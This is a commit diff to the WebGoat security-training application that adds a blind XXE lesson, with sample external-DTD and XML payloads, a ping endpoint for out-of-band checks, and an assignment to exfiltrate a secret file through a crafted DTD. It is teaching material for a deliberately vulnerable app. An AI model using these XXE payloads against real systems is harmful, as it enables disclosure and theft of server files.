XXE checkin
This commit is contained in:
Nanne Baars
@ -115,6 +115,58 @@
|
||||
<div class="adoc-content" th:replace="doc:XXE_overflow.adoc"></div>
|
||||
</div>
|
||||
|
||||
<div class="lesson-page-wrapper">
|
||||
<!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
|
||||
<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
|
||||
which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
|
||||
<div class="adoc-content" th:replace="doc:XXE_blind.adoc"></div>
|
||||
</div>
|
||||
|
||||
<div class="lesson-page-wrapper">
|
||||
<!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
|
||||
<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
|
||||
which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
|
||||
<div class="adoc-content" th:replace="doc:XXE_blind_assignment.adoc"></div>
|
||||
<div class="attack-container">
|
||||
<!-- using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat -->
|
||||
<!-- you can write your own custom forms, but standard form submission will take you to your endpoint and outside of the WebGoat framework -->
|
||||
<!-- of course, you can write your own ajax submission /handling in your own javascript if you like -->
|
||||
<form class="attack-form" accept-charset="UNKNOWN" prepareData="registerJson" method="POST" name="form"
|
||||
action="/WebGoat/XXE/content-type" contentType="application/json">
|
||||
<script th:src="@{/plugin_lessons/plugin/XXE/js/xxe.js}"
|
||||
language="JavaScript"></script>
|
||||
<div id="lessonContent">
|
||||
<strong>Registration form</strong>
|
||||
<form prepareData="registerJson" accept-charset="UNKNOWN" method="POST" name="form" action="#attack/307/100">
|
||||
<table>
|
||||
<tr>
|
||||
<td>Username</td>
|
||||
<td><input name="username" value="" type="TEXT"/></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>E-mail</td>
|
||||
<td><input name="email" value="" type="TEXT"/></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Password</td>
|
||||
<td><input name="email" value="" type="TEXT"/></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td></td>
|
||||
<td align="right"><input type="submit" value="Sign up"/></td>
|
||||
</tr>
|
||||
</table>
|
||||
<br/>
|
||||
<br/>
|
||||
</form>
|
||||
<div class="attack-feedback"></div>
|
||||
<div class="attack-output"></div>
|
||||
</div>
|
||||
</form>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
|
||||
<div class="lesson-page-wrapper">
|
||||
<!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
|
||||
<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
|
||||
|
||||
@ -0,0 +1,55 @@
|
||||
== Blind XXE
|
||||
|
||||
In some cases you will see no output because although your attack might have worked the field is not reflected in the output of page.
|
||||
Or the resource you are trying to read contains illegal XML character which causes the parser to fail.
|
||||
Let's start with an example, in this case we reference a external DTD which we control on our own server.
|
||||
|
||||
Our WebGoat server by default has an /xxe/ping endpoint which we can use. In real case this can be any server you control.
|
||||
|
||||
[source]
|
||||
----
|
||||
curl -i http://localhost:8080/WebGoat/XXE/ping
|
||||
|
||||
will result in:
|
||||
|
||||
GET curl/7.45.0
|
||||
----
|
||||
|
||||
at the server side.
|
||||
|
||||
How do we use this endpoint to verify whether we can perform XXE?
|
||||
|
||||
In the `~/${user.home}/.webgoat/plugin/XXE` create a file called attack.dtd
|
||||
|
||||
[source]
|
||||
----
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!ENTITY ping SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=HelloWorld'>
|
||||
----
|
||||
|
||||
Now submit the form and change the xml to:
|
||||
|
||||
[source]
|
||||
----
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE root [
|
||||
<!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/attack.dtd">
|
||||
%remote;
|
||||
]>
|
||||
<user>
|
||||
<username>test&ping;</username>
|
||||
</user>
|
||||
----
|
||||
|
||||
Now if we check our server log we will see:
|
||||
|
||||
[source]
|
||||
----
|
||||
GET Java/1.8.0_101 HelloWorld
|
||||
----
|
||||
|
||||
So with the XXE we are able to ping our own server which means XXE injection is possible.
|
||||
|
||||
[NOTE]
|
||||
In this case we use http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd to fetch the dtd but in reality this will
|
||||
of course be a host fully under the attackers control.
|
||||
@ -0,0 +1,7 @@
|
||||
== Blind XXE assignment
|
||||
|
||||
In the previous page we showed you how you can ping a server with a XXE attack, in this assigment try to make a DTD which will upload the
|
||||
contents of ~/.webgoat/plugin/XXE/secret.txt to our server. For Linux: `/home/USER/.webgoat/plugin/XXE/secret.txt`, for Windows
|
||||
this would be `c:/Users/USER/.webgoat/plugin/XXE/secret.txt`
|
||||
|
||||
Try to upload this file using the following endpoint: `http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]`
|
||||
@ -1,7 +1,7 @@
|
||||
== Modern REST framework
|
||||
|
||||
In modern REST frameworks the server might be able to accepts data formats that you as a developer did not think about.
|
||||
So this might result in JSON endpoints being vulnerable for XXE attacks.
|
||||
So this might result in JSON endpoints being vulnerable to XXE attacks.
|
||||
|
||||
Again same exercise but try to perform the same XML injection as we did in first lesson.
|
||||
Again same exercise but try to perform the same XML injection as we did in first assigment.
|
||||
|
||||
|
||||
@ -31,4 +31,9 @@ paths in the system identifier. Since the attack occurs relative to the applicat
|
||||
trusted application to pivot to other internal systems, possibly disclosing other internal content via http(s) requests or launching a CSRF attack to
|
||||
any unprotected internal services. In some situations, an XML processor library that is vulnerable to client-side memory corruption issues
|
||||
may be exploited by dereferencing a malicious URI, possibly allowing arbitrary code execution under the application account. Other attacks can access
|
||||
local resources that may not stop returning data, possibly impacting application availability if too many threads or processes are not released.
|
||||
local resources that may not stop returning data, possibly impacting application availability if too many threads or processes are not released.
|
||||
|
||||
In general we can distinguish the following kind of XXE attacks:
|
||||
* Classic: in this case an external entity is included in a local DTD
|
||||
* Blind: no output and or errors are shown in the response
|
||||
* Error: try to get the content of a resource in the error message
|
||||
@ -23,8 +23,7 @@ With the same XXE attack we can perform a DOS service attack towards the server.
|
||||
|
||||
When XML parser loads this document, it sees that it includes one root element, "lolz", that contains the text "&lol9;". However, "&lol9;" is a defined
|
||||
entity that expands to a string containing ten "&lol8;" strings. Each "&lol8;" string is a defined entity that expands to ten "&lol7;" strings, and so on.
|
||||
After all the entity expansions have been processed, this small (< 1 KB) block of XML will actually contain 109 = a billion "lol"s, taking up almost 3
|
||||
gigabytes of memory.
|
||||
After all the entity expansions have been processed, this small (< 1 KB) block of XML will actually take up almost 3 gigabytes of memory.
|
||||
|
||||
This is called a "Billion laughs", more information can be found here: https://en.wikipedia.org/wiki/Billion_laughs
|
||||
|
||||
|
||||
@ -0,0 +1 @@
|
||||
WebGoat 8 rocks...
|
||||
Reference in New Issue
Block a user